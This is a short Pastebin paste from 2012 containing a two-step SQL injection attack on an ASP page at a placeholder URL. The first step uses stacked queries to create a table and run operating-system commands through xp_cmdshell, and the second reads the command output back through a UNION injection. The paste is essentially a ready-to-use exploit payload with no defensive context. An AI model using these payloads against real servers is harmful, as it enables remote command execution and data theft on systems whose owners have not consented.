- 1) executing xp_cmdshell
- http://www.target.com/vuln.asp?param=1';IF object_id('result') IS NOT NULL DROP TABLE result; CREATE TABLE result (output varchar(200));INSERT INTO result EXEC xp_cmdshell 'dir C:'--
- 2) result retrieval through UNION injection
- http://www.target.com/vuln.asp?param=-1' UNION ALL SELECT NULL, NULL, output FROM result--
stamparm Jun 20th, 2012 356 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
RAW Paste Data